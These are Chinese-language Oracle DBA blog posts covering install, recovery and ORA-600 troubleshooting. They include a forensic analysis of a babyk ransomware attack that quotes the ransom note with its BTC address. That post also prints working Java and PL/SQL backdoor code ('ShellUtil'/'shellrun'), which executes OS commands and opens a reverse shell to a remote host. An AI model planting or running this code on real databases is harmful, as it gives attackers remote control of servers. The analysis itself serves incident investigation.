Error in invoking target ‘libasmclntsh19.ohso libasmperl19.ohso client_sharedlib’问题处理

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:Error in invoking target ‘libasmclntsh19.ohso libasmperl19.ohso client_sharedlib’问题处理

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

最近在redhat 8.x系列系统中安装Oracle 19c,编译的过程中出现类似:[FATAL] Error in invoking target ‘libasmclntsh19.ohso libasmperl19.ohso client_sharedlib’ of makefile ‘/u01/app/oracle/product/19c/db_1/rdbms/lib/ins_rdbms.mk’.错误

[oracle@xifenfei db_1]$ ./runInstaller -ignorePrereq -waitforcompletion -silent \
>   oracle.install.option=INSTALL_DB_SWONLY \
>   UNIX_GROUP_NAME=oinstall \
>   INVENTORY_LOCATION=${ORACLE_BASE}/oraInventory \
>   ORACLE_HOME=${ORACLE_HOME} \
>   ORACLE_BASE=${ORACLE_BASE} \
>   oracle.install.db.InstallEdition=EE \
>   oracle.install.db.OSDBA_GROUP=dba \
>   oracle.install.db.OSBACKUPDBA_GROUP=backupdba \
>   oracle.install.db.OSDGDBA_GROUP=dgdba \
>   oracle.install.db.OSKMDBA_GROUP=kmdba \
>   oracle.install.db.OSRACDBA_GROUP=dba \
>   SECURITY_UPDATES_VIA_MYORACLESUPPORT=false \
>   DECLINE_SECURITY_UPDATES=true
Launching Oracle Database Setup Wizard...

[WARNING] [INS-13014] Target environment does not meet some optional requirements.
   CAUSE: Some of the optional prerequisites are not met. See logs for details. 
/u01/app/oraInventory/logs/InstallActions2025-06-02_05-13-46PM/installActions2025-06-02_05-13-46PM.log
   ACTION: Identify the list of failed prerequisite checks from the log: 
/u01/app/oraInventory/logs/InstallActions2025-06-02_05-13-46PM/installActions2025-06-02_05-13-46PM.log. 
Then either from the log file or from installation manual 
find the appropriate configuration to meet the prerequisites and fix it manually.
The response file for this session can be found at:
 /u01/app/oracle/product/19c/db_1/install/response/db_2025-06-02_05-13-46PM.rsp

You can find the log of this install session at:
 /u01/app/oraInventory/logs/InstallActions2025-06-02_05-13-46PM/installActions2025-06-02_05-13-46PM.log
[FATAL] Error in invoking target 'libasmclntsh19.ohso libasmperl19.ohso client_sharedlib' of 
makefile '/u01/app/oracle/product/19c/db_1/rdbms/lib/ins_rdbms.mk'. See 
'/u01/app/oraInventory/logs/InstallActions2025-06-02_05-13-46PM/installActions2025-06-02_05-13-46PM.log' for details.

查看日志中具体信息

INFO:
/usr/bin/ld
INFO:
: cannot find -lclntsh

INFO:
make[2]: *** [/u01/app/oracle/product/19c/db_1/rdbms/lib/env_rdbms.mk:5232: dlopenlib] Error 1

INFO:
make[2]: Leaving directory '/u01/app/oracle/product/19c/db_1/rdbms/lib'

INFO:
make[1]: *** [/u01/app/oracle/product/19c/db_1/rdbms/lib/env_rdbms.mk:5210: 
 /u01/app/oracle/product/19c/db_1/lib/libasmperl19.so] Error 2

INFO:
make[1]: Leaving directory '/u01/app/oracle/product/19c/db_1/rdbms/lib'

INFO:
make: *** [/u01/app/oracle/product/19c/db_1/rdbms/lib/env_rdbms.mk:5247: libasmperl19.ohso] Error 2

INFO: End output from spawned process.
INFO: ----------------------------------
INFO: Exception thrown from action: make
Exception Name: MakefileException
Exception String: Error in invoking target 'libasmclntsh19.ohso libasmperl19.ohso client_sharedlib' of makefile 
'/u01/app/oracle/product/19c/db_1/rdbms/lib/ins_rdbms.mk'. See 
'/u01/app/oraInventory/logs/InstallActions2025-06-02_05-13-46PM/installActions2025-06-02_05-13-46PM.log' for details.
Exception Severity: 1
INFO:  [Jun 2, 2025 5:16:23 PM] Adding ExitStatus STOP_INSTALL to the exit status set
INFO:  [Jun 2, 2025 5:16:23 PM] Finding the most appropriate exit status for the current application
INFO:  [Jun 2, 2025 5:16:23 PM] inventory location is/u01/app/oraInventory
INFO:  [Jun 2, 2025 5:16:23 PM] Adding ExitStatus SUCCESS_WITH_WARNINGS to the exit status set
INFO:  [Jun 2, 2025 5:16:23 PM] Finding the most appropriate exit status for the current application
INFO:  [Jun 2, 2025 5:16:23 PM] Exit Status is -4
INFO:  [Jun 2, 2025 5:16:23 PM] Shutdown Oracle Database 19c Installer
INFO:  [Jun 2, 2025 5:16:23 PM] Unloading Setup Driver

提示缺少lclntsh,对应到数据中为libclntsh动态库文件,检查数据lib中相关文件

[oracle@xifenfei lib]$ ls -ltr libclntsh*
lrwxrwxrwx 1 oracle oinstall      12 Jun  2 16:06 libclntsh.so.11.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall      12 Jun  2 16:06 libclntsh.so.10.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall      12 Jun  2 16:06 libclntsh.so.12.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall      12 Jun  2 16:06 libclntsh.so.18.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall      17 Jun  2 16:06 libclntsh.so -> libclntsh.so.19.1
-rwxr-xr-x 1 oracle oinstall 8057080 Jun  2 16:11 libclntshcore.so.19.1
lrwxrwxrwx 1 oracle oinstall      21 Jun  2 16:11 libclntshcore.so -> libclntshcore.so.19.1

发现libclntsh.so.*.1都软连接到 libclntsh.so.19.1 而 libclntsh.so.19.1这个文件本身丢失,从安装介质中找到该文件并传输到lib中,修改权限

[oracle@xifenfei ~]$ cd $ORACLE_HOME/lib
[oracle@xifenfei lib]$ cp /tmp/libclntsh.so.19.1 ./
[oracle@xifenfei lib]$ chmod 777 libclntsh.so.19.1
[oracle@xifenfei lib]$ ls -ltr libclntsh*
lrwxrwxrwx 1 oracle oinstall       12 Jun  2 17:31 libclntsh.so.10.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall       12 Jun  2 17:31 libclntsh.so.11.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall       12 Jun  2 17:31 libclntsh.so.12.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall       12 Jun  2 17:31 libclntsh.so.18.1 -> libclntsh.so
lrwxrwxrwx 1 oracle oinstall       17 Jun  2 17:34 libclntsh.so -> libclntsh.so.19.1
lrwxrwxrwx 1 oracle oinstall       21 Jun  2 17:34 libclntshcore.so -> libclntshcore.so.19.1
-rwxr-xr-x 1 oracle oinstall 82573024 Jun  2 17:34 libclntsh.so.19.1
-rwxr-xr-x 1 oracle oinstall  8057080 Jun  2 17:34 libclntshcore.so.19.1

后续重新执行runInstaller相关命令安装正常,这个问题本质是由于libclntsh.so.19.1文件丢失导致,我查看了unzip解压日志,发现是解压出来了该文件的,具体什么原因丢失未知
233759


ORA-01171: datafile N going offline due to error advancing checkpoint

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:ORA-01171: datafile N going offline due to error advancing checkpoint

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

最近接到一个客户有一个数据文件offline的恢复咨询,通过分析日志,当时是由于在启动的时候数据文件被占用导致后续数据库open之后,该文件被强制offline掉

Fri May 16 20:01:05 2025
Database mounted in Exclusive Mode
Completed: ALTER DATABASE   MOUNT
Fri May 16 20:01:05 2025
ALTER DATABASE OPEN
Fri May 16 20:01:06 2025
LGWR: STARTING ARCH PROCESSES
ARC0 started with pid=70, OS id=4628
Fri May 16 20:01:06 2025
ARC0: Archival started
ARC1 started with pid=74, OS id=4840
Fri May 16 20:01:06 2025
ARC1: Archival started
LGWR: STARTING ARCH PROCESSES COMPLETE
Fri May 16 20:01:06 2025
Errors in file d:\oracle\product\10.2.0\admin\orcl\bdump\orcl_lgwr_4080.trc:
ORA-01110: data file 14: 'D:\ORADATA\XIFENFEI105_DAT_1.DBF'
ORA-01114: IO error writing block to file 14 (block # 1)
ORA-27041: unable to open file
OSD-04002: 无法打开文件
O/S-Error: (OS 32) 另一个程序正在使用此文件,进程无法访问。

Thread 1 opened at log sequence 172421
  Current log# 1 seq# 172421 mem# 0: D:\ORACLE\PRODUCT\10.2.0\ORADATA\ORCL\REDO01.LOG
Fri May 16 20:01:06 2025
ARC1: STARTING ARCH PROCESSES
Fri May 16 20:01:06 2025
Successful open of redo thread 1
Fri May 16 20:01:06 2025
ARC0: Becoming the 'no FAL' ARCH
ARC0: Becoming the 'no SRL' ARCH
Fri May 16 20:01:06 2025
ARC2: Archival started
ARC1: STARTING ARCH PROCESSES COMPLETE
ARC2 started with pid=78, OS id=4056
Fri May 16 20:01:06 2025
ARC1: Becoming the heartbeat ARCH
Fri May 16 20:01:06 2025
MTTR advisory is disabled because FAST_START_MTTR_TARGET is not set
Fri May 16 20:01:06 2025
SMON: enabling cache recovery
Fri May 16 20:01:07 2025
Successfully onlined Undo Tablespace 1.
Fri May 16 20:01:07 2025
SMON: enabling tx recovery
Fri May 16 20:01:08 2025
Database Characterset is ZHS16GBK
replication_dependency_tracking turned off (no async multimaster replication found)
Starting background process QMNC
QMNC started with pid=86, OS id=4492
Fri May 16 20:01:12 2025
db_recovery_file_dest_size of 51200 MB is 1.97% used. This is a
user-specified limit on the amount of space that will be used by this
database for recovery-related files, and does not reflect the amount of
space available in the underlying filesystem or ASM diskgroup.
Fri May 16 20:01:13 2025
Completed: ALTER DATABASE OPEN
Fri May 16 20:06:44 2025
Restarting dead background process MMON
MMON started with pid=98, OS id=4232
Fri May 16 20:07:06 2025
Shutting down archive processes
Fri May 16 20:07:11 2025
ARCH shutting down
ARC2: Archival stopped
Fri May 16 20:10:32 2025
Thread 1 advanced to log sequence 172422
  Current log# 2 seq# 172422 mem# 0: D:\ORACLE\PRODUCT\10.2.0\ORADATA\ORCL\REDO02.LOG
Fri May 16 20:15:33 2025
Errors in file d:\oracle\product\10.2.0\admin\orcl\bdump\orcl_ckpt_2496.trc:
ORA-01171: datafile 14 going offline due to error advancing checkpoint
ORA-01122: database file 14 failed verification check
ORA-01110: data file 14: 'D:\ORADATA\XIFENFEI105_DAT_1.DBF'
ORA-01208: data file is an old version - not accessing current version

Fri May 16 20:23:09 2025
Starting background process EMN0
EMN0 started with pid=82, OS id=2660

通过dbv检查报错文件,确认被offline文件本身正常
dbv


本身这个故障相对比较简单,只要归档存在直接recover datafile,然后online即可,但是由于备份软件定时工作,导致对应的归档被备份走

Fri May 16 21:55:10 2025
Control autobackup written to SBT_TAPE device
	comment 'API Version 2.0,MMS Version 10.0.0.116',
	media 'V_6746190_6959024'
	handle 'c-1300253653-20250516-00'
Fri May 16 21:56:03 2025
Thread 1 cannot allocate new log, sequence 172423
Private strand flush not complete
  Current log# 2 seq# 172422 mem# 0: D:\ORACLE\PRODUCT\10.2.0\ORADATA\ORCL\REDO02.LOG

而且被异常的数据文件不是核心业务文件,导致客户没有及时发现,等到发现之时尝试recover datafile,提示缺少归档

Wed May 28 17:26:01 2025
alter database recover datafile list clear
Wed May 28 17:26:01 2025
Completed: alter database recover datafile list clear
Wed May 28 17:26:01 2025
alter database recover if needed
 datafile 14

Media Recovery Start
 parallel recovery started with 16 processes
ORA-279 signalled during: alter database recover if needed
 datafile 14
...
Wed May 28 17:26:11 2025
alter database recover cancel
Wed May 28 17:26:13 2025
Media Recovery Canceled
Completed: alter database recover cancel
Wed May 28 17:38:58 2025
ALTER DATABASE RECOVER  datafile 'D:\ORADATA\XIFENFEI105_DAT_1.DBF'  
Wed May 28 17:38:58 2025
Media Recovery Start
 parallel recovery started with 16 processes
ORA-279 signalled during: ALTER DATABASE RECOVER  datafile 'D:\ORADATA\XIFENFEI105_DAT_1.DBF'  ...
Wed May 28 18:26:37 2025
ALTER DATABASE RECOVER    CONTINUE DEFAULT  
Wed May 28 18:26:38 2025
Media Recovery Log D:\ORACLE\PRODUCT\10.2.0\FLASH_RECOVERY_AREA\ORCL\ARCHIVELOG\2025_05_28\O1_MF_1_172421_%U_.ARC
Errors with log D:\ORACLE\PRODUCT\10.2.0\FLASH_RECOVERY_AREA\ORCL\ARCHIVELOG\2025_05_28\O1_MF_1_172421_%U_.ARC
ORA-308 signalled during: ALTER DATABASE RECOVER    CONTINUE DEFAULT  ...
Wed May 28 18:26:38 2025
ALTER DATABASE RECOVER    CONTINUE DEFAULT  
Wed May 28 18:26:38 2025
Media Recovery Log D:\ORACLE\PRODUCT\10.2.0\FLASH_RECOVERY_AREA\ORCL\ARCHIVELOG\2025_05_28\O1_MF_1_172421_%U_.ARC
Errors with log D:\ORACLE\PRODUCT\10.2.0\FLASH_RECOVERY_AREA\ORCL\ARCHIVELOG\2025_05_28\O1_MF_1_172421_%U_.ARC
ORA-308 signalled during: ALTER DATABASE RECOVER    CONTINUE DEFAULT  ...
Wed May 28 18:26:38 2025
ALTER DATABASE RECOVER CANCEL 
Wed May 28 18:26:40 2025
Media Recovery Canceled
Completed: ALTER DATABASE RECOVER CANCEL 

这个客户运气还不错,带库中的需要恢复的归档日志都还在,通过指定带库通道,直接recover datafile成功

RUN {
  ALLOCATE CHANNEL ch1 DEVICE TYPE 'sbt_tape' 
  PARMS="BLKSIZE=262144,ENV=(CV_mmsApiVsn=2,CV_channelPar=ch1)";
  ALLOCATE CHANNEL ch2 DEVICE TYPE 'sbt_tape' 
  PARMS="BLKSIZE=262144,ENV=(CV_mmsApiVsn=2,CV_channelPar=ch2)";
 recover datafile 14;
}

rec
ok


至此完美解决该问题,通过这个case,的出来的经验有:
1. 数据库重启之后,要检查数据库日志和查询数据库数据文件状态(主要防止一些不太常用的文件异常,不能及时发现)
2. 需要需要数据库的基本情况,比如备份,容灾,asm磁盘组冗余,存储冗余,网络冗余等情况,这样出现问题好排查解决

linux环境oracle数据库被文件系统勒索加密为.babyk扩展名溯源

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:linux环境oracle数据库被文件系统勒索加密为.babyk扩展名溯源

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

最近有一个客户使用了xx厂商的erp软件的Oracle数据库服务被勒索加密(运行在linux平台)
文件加密结果
文件名称被加上.babyk,每个目录下面会留下一个README_babyk.txt文件
0


README_babyk.txt文件内容

                            ___                                                     
 ______  ______  ______   .'   `.                           ______  ______  ______  
|______||______||______| /  .-.  \  .--.   _ .--.   .--.   |______||______||______| 
 ______  ______  ______  | |   | |/ .'`\ \[ '/'`\ \( (`\]   ______  ______  ______  
|______||______||______| \  `-'  /| \__. | | \__/ | `'.'.  |______||______||______| 
                          `.___.'  '.__.'  | ;.__/ [\__) )                          
                                          [__|                                      

                                        
=========================================================
What Happened to My Computer?

Your important files are encrypted.
Many of your documents, photos, videos, databases and other files are no longer
accessible because they have been encrypted. Maybe you are busy looking for a way to
recover your files, but do not waste your time. 
=========================================================

=========================================================
Can I Recover My Files?

Sure. We guarantee that you can recover all your files safely and easily. But you have
not so enough time.if you want to decrypt all your files, you need to pay.
You only have 3 days to submit the payment. After that the price will be doubled.
Also, if you don't pay in 7 days, you won't be able to recover your files forever.
=========================================================

=========================================================
How Do I Pay?

Your Encryption ID:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Payment is accepted in BTC only. If you don't know what's BTC, please Google for 
information on how to buy and pay for BTC.

Send $6000 worth of BTC to this address:

bc1q2p280472y0ssqcr6lhzz3qxxgevg3a63ewacl9

After the payment is completed, Please send your encryption ID and proof of payment to our email.
We will reply to the decryption program to your email address.
=========================================================

=========================================================
How to Contact Us?

aip6jmb@tuta.io
setack@tuta.io

=========================================================

*Warning: Don't try to decrypt by yourself, you may permanently damage your files. 

然后客户找人进行勒索解密,结果对于大于16G左右的文件解密失败.解密失败原因是由于较大文件加密算法问题,导致他们拿到了解密程序也无法解密,具体对于加密文件对比说明:
解密成功文件大小和文件尾部
4
3
解密失败文件大小和文件尾部
1
2


通过对比可以确认文件和占用空间一致,而且尾部没有多出来38byte的字符串的文件是属于解密失败(因为本身加密就不正常)

被勒索加密源头分析
通过解密成功的system01.dbf文件打开库,然后检查数据库中对象,发现一个异常的函数shellrun

create or replace function shellrun(methodName varchar2,
                                    params     varchar2,
                                    encoding   varchar2) return varchar2 as
  language java name 'ShellUtil.run(java.lang.String,java.lang.String,java.lang.String) return java.lang.String';

分析对应的java相关的ShellUtil,检查发现有以下部分
ShellUtil


进一步分析ShellUtil中内容

create or replace and compile java source named "ShellUtil" as
import java.io.*;
import java.net.Socket;
import java.util.concurrent.RecursiveTask;

public class ShellUtil extends Object{
    public static String run(String methodName, String params, String encoding) {
        String res = "";
        if (methodName.equals("exec")) {
            res = ShellUtil.exec(params, encoding);
        }else if (methodName.equals("connectback")) {
            String ip = params.substring(0, params.indexOf("^"));
            String port = params.substring(params.indexOf("^") + 1);
            res = ShellUtil.connectBack(ip, Integer.parseInt(port));
        }else {
            res = "unkown methodName";
        }
        return res;
    }

    public static String exec(String command, String encoding) {
        StringBuffer result = new StringBuffer();
        try {
            String[] finalCommand;
            if (System.getProperty("os.name").toLowerCase().contains("windows")) {
                String systemRootvariable;
                try {
                    systemRootvariable = System.getenv("SystemRoot");
                }
                catch (ClassCastException e) {
                    systemRootvariable = System.getProperty("SystemRoot");
                }
                finalCommand = new String[3];
                finalCommand[0] = systemRootvariable+"\\system32\\cmd.exe";
                finalCommand[1] = "/c";
                finalCommand[2] = command;
            } else { // Linux or Unix System
                finalCommand = new String[3];
                finalCommand[0] = "/bin/sh";
                finalCommand[1] = "-c";
                finalCommand[2] = command;
            }
            BufferedReader readerIn = null;
            BufferedReader readerError = null;
            try {
                readerIn = new BufferedReader(new InputStreamReader
                    (Runtime.getRuntime().exec(finalCommand).getInputStream(),encoding));
                String stemp = "";
                while ((stemp = readerIn.readLine()) != null){
                    result.append(stemp).append("\n");
                }
            }catch (Exception e){
                result.append(e.toString());
            }finally {
                if (readerIn != null) {
                    readerIn.close();
                }
            }
            try {
                readerError = new BufferedReader(new InputStreamReader
              (Runtime.getRuntime().exec(finalCommand).getErrorStream(), encoding));
                String stemp = "";
                while ((stemp = readerError.readLine()) != null){
                    result.append(stemp).append("\n");
                }
            }catch (Exception e){
                result.append(e.toString());
            }finally {
                if (readerError != null) {
                    readerError.close();
                }
            }
        } catch (Exception e) {
            result.append(e.toString());
        }
        return result.toString();
    }

    public static String connectBack(String ip, int port) {
        class StreamConnector extends Thread {
            InputStream sp;
            OutputStream gh;

            StreamConnector(InputStream sp, OutputStream gh) {
                this.sp = sp;
                this.gh = gh;
            }
            @Override
            public void run() {
                BufferedReader xp = null;
                BufferedWriter ydg = null;
                try {
                    xp = new BufferedReader(new InputStreamReader(this.sp));
                    ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
                    char buffer[] = new char[1024];
                    int length;
                    while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
                        ydg.write(buffer, 0, length);
                        ydg.flush();
                    }
                } catch (Exception e) {}
                try {
                    if (xp != null) {
                        xp.close();
                    }
                    if (ydg != null) {
                        ydg.close();
                    }
                } catch (Exception e) {
                }
            }
        }
        try {
            String sp;
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                sp = new String("/bin/sh");
            } else {
                sp = new String("cmd.exe");
            }
            Socket sk = new Socket(ip, port);
            Process ps = Runtime.getRuntime().exec(sp);
            (new StreamConnector(ps.getInputStream(), sk.getOutputStream())).start();
            (new StreamConnector(sk.getInputStream(), ps.getOutputStream())).start();
        } catch (Exception e) {
        }
        return "^OK^";
    }
}

这些程序的创建时间分析
time


这些程序都是4月24日14:58:40-14:58:50之间创建,通过咨询客户,客户的应用在4月24日上午进行了升级.基于上述情况,初步怀疑是通过应用给数据库层面注入了恶意脚本,创建了函数和一些java包,实现提权获取了操作系统权限,然后对操作系统文件进行加密.最终结论需要等应用和安全厂商进行确认

ORA-600 ksvworkmsgalloc: bad reaper

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:ORA-600 ksvworkmsgalloc: bad reaper

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

有一个朋友说他们想把12c的库还原到19c版本中然后进行升级测试,结果在打开库的过程中发现几个错误,让我给帮忙分析下
resetlogs 报ORA-00392 ORA-00312

SQL> alter database open resetlogs upgrade;
alter database open resetlogs upgrade
*
ERROR at line 1:
ORA-00392: log 7 of thread 1 is being cleared, operation not allowed
ORA-00312: online log 7 thread 1: '/DBS1/data/NDBS/onlinelog/redo07_m1.log '
ORA-00312: online log 7 thread 1: '/DBS1/arch/NDBS/onlinelog/redo07_m2.log '

这个错误一般是由于redo状态不对,比如标记为了CLEARING_CURRENT,处理操作

SQL> select group#,status from v$log;

          GROUP# STATUS
---------------- ----------------
               1 CLEARING
               2 CLEARING
               3 CLEARING
               4 CLEARING
              10 CLEARING
               6 CLEARING
               7 CLEARING_CURRENT
               8 CLEARING
               9 CLEARING
               5 CLEARING

10 rows selected.


SQL> alter database clear logfile group 7;

Database altered.

SQL> select group#,status from v$log;

          GROUP# STATUS
---------------- ----------------
               1 CLEARING
               2 CLEARING
               3 CLEARING
               4 CLEARING
              10 CLEARING
               6 CLEARING
               7 CURRENT
               8 CLEARING
               9 CLEARING
               5 CLEARING

10 rows selected.

再次reseltogs报ORA-600 ksvworkmsgalloc: bad reaper错误

SQL> alter database open resetlogs upgrade;
alter database open resetlogs upgrade
*
ERROR at line 1:
ORA-00600: internal error code, arguments: [ksvworkmsgalloc: bad reaper], [0x080010003], [], [], []

这个错误通过查询MOS 发现Open Resetlogs Fail with ORA-00600[ksvworkmsgalloc: bad reaper] (Doc ID 2728106.1)文章中描述,由于non-ASM to ASM环境redo文件在clear的时候触发该问题
KSVWORKMSGALLOW


是由于db_create_online_log_dest_1参数没有设置导致,对于该库是由asm环境到文件系统,估计也是在resetlogs的时候clear redo报出来该错误,解决办法给该库设置上
db_create_online_log_dest_1=/DBS1/data,db_create_online_log_dest_2=/DBS1/arch,然后打开库成功
QQ20250519-231821

ORA-600 krccfl_chunk故障处理

联系:手机/微信(+86 17813235971) QQ(107644445)QQ咨询惜分飞

标题:ORA-600 krccfl_chunk故障处理

作者:惜分飞©版权所有[未经本人同意,不得以任何形式转载,否则有进一步追究法律责任的权利.]

一个数据库启动包ORA-600 krccfl_chunk错误

2025-05-06T10:37:47.428203+08:00
Completed: ALTER DATABASE MOUNT /* db agent *//* {2:50212:2} */
ALTER DATABASE OPEN /* db agent *//* {2:50212:2} */
2025-05-06T10:37:47.433709+08:00
This instance was first to open
Block change tracking file is current.
Ping without log force is disabled:
  not an Exadata system.
start recovery: pdb 0, passed in flags x4 (domain enable 5) 
2025-05-06T10:37:48.203383+08:00
Beginning crash recovery of 2 threads
2025-05-06T10:37:48.568120+08:00
 parallel recovery started with 32 processes
2025-05-06T10:37:48.610951+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.611037+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.611243+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.611438+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.614947+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.616591+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617188+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617253+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617428+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617606+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617676+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.617809+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.636568+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.636568+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.636620+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.637156+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.637300+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.637881+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.637999+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.638112+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.638241+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.638304+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.638338+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.638347+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.641621+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.642926+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643092+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643192+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643204+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643372+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643516+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.643573+08:00
start recovery: pdb 0, passed in flags x5 (domain enable 5) 
2025-05-06T10:37:48.748956+08:00
Started redo scan
2025-05-06T10:37:49.849382+08:00
Completed redo scan
 read 469347 KB redo, 1213 data blocks need recovery
2025-05-06T10:37:50.007840+08:00
Started redo application at
 Thread 1: logseq 369323, block 651514, offset 0
 Thread 2: logseq 132962, block 1319944, offset 0
2025-05-06T10:37:50.016910+08:00
Recovery of Online Redo Log: Thread 1 Group 13 Seq 369323 Reading mem 0
  Mem# 0: +DATA/orcl/ONLINELOG/group_13.349.978709791
  Mem# 1: +FRA/orcl/ONLINELOG/group_13.12992.978709793
2025-05-06T10:37:50.025725+08:00
Recovery of Online Redo Log: Thread 2 Group 18 Seq 132962 Reading mem 0
  Mem# 0: +DATA/orcl/ONLINELOG/group_18.354.978710003
  Mem# 1: +FRA/orcl/ONLINELOG/group_18.12997.978710005
2025-05-06T10:37:51.063556+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_ora_68031.trc(incident=868005)(PDBNAME=CDB$ROOT):
ORA-00600: internal error code, arguments: [krccfl_chunk], [0x7F9BBB30BE58], [166528],[],[],[],[],[],[],[],[],[]
Incident details in: /u01/app/oracle/diag/rdbms/orcl/orcl2/incident/incdir_868005/orcl2_ora_68031_i868005.trc
2025-05-06T10:37:52.269823+08:00
Dumping diagnostic data in directory=[cdmp_20250506103752],requested by(instance=2,osid=68031),summary=[incident=868005].
2025-05-06T10:37:52.306517+08:00
Use ADRCI or Support Workbench to package the incident.
See Note 411.1 at My Oracle Support for error and packaging details.
2025-05-06T10:37:52.310723+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310813+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310820+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310853+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310902+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310907+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310945+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.310950+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.310987+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311002+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311009+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311017+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311055+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311055+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311064+08:00
Slave encountered ORA-10388 exception during crash recovery
2025-05-06T10:37:52.311071+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311080+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311107+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311119+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311126+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311135+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p000_69617.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311156+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311184+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311203+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311205+08:00
Recovery slave process is holding some recovery locks. Killing the instance now.
2025-05-06T10:37:52.311211+08:00
Errors in file /u01/app/oracle/diag/rdbms/orcl/orcl2/trace/orcl2_p001_69619.trc:
ORA-10388: parallel query server interrupt (failure)
2025-05-06T10:37:52.311276+08:00
